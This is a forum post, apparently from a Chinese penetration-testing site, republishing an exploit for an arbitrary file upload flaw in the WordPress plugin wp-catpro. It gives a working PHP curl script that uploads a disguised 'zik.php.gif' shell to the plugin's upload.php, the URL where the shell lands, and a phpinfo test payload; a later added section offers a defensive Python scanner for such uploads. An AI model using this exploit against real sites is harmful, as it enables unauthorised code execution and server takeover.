China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit Info :
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

<?php
phpinfo();
?>
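
For triage on the defending side, the following is an added example and not part of the original post or the plugin's code. It scans an uploads directory for what the advisory describes: a file whose name ends in an allowed image extension but carries a script extension before it, or whose content is not the image its name claims. The script-extension list, the function names and the sample files are assumptions constructed for this example.

```python
import tempfile
from pathlib import Path

# Allowed list quoted on the page from the plugin's upload handler.
ALLOWED_EXTENSIONS = {"jpg", "gif", "png"}
# Assumption of this example: extensions a server may hand to PHP.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}
IMAGE_MAGIC = {"jpg": (b"\xff\xd8\xff",), "gif": (b"GIF87a", b"GIF89a"),
               "png": (b"\x89PNG\r\n\x1a\n",)}


def inspect_upload(name, data):
    """Return the reasons a stored upload looks suspicious ([] if none)."""
    reasons = []
    parts = name.lower().split(".")
    final_ext = parts[-1] if len(parts) > 1 else ""
    if final_ext not in ALLOWED_EXTENSIONS:
        reasons.append("final extension not allowed")
    if any(ext in SCRIPT_EXTENSIONS for ext in parts[1:-1]):
        reasons.append("script extension before final extension")
    magic = IMAGE_MAGIC.get(final_ext, ())
    if magic and not data.startswith(magic):
        reasons.append("content does not match image type")
    if b"<?php" in data.lower():
        reasons.append("PHP open tag in content")
    return reasons


def scan_upload_dir(root):
    """Map each suspicious file (POSIX path relative to root) to its reasons."""
    findings = {}
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        with path.open("rb") as fh:
            head = fh.read(65536)  # the head of the file is enough for triage
        reasons = inspect_upload(path.name, head)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Scan a constructed uploads/catpro tree: one GIF header, one PHP file."""
    samples = {"logo.gif": b"GIF89a" + b"\x00" * 16,
               "random_name.php.gif": b"<?php phpinfo(); ?>"}
    with tempfile.TemporaryDirectory() as root:
        Path(root, "catpro").mkdir()
        for name, data in samples.items():
            Path(root, "catpro", name).write_bytes(data)
        return scan_upload_dir(root)
```

Run `scan_upload_dir()` against the site's real `wp-content/uploads` path; any finding under `catpro/` on a site that had this plugin installed warrants review of the web server access log for requests to the plugin's `upload.php`.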



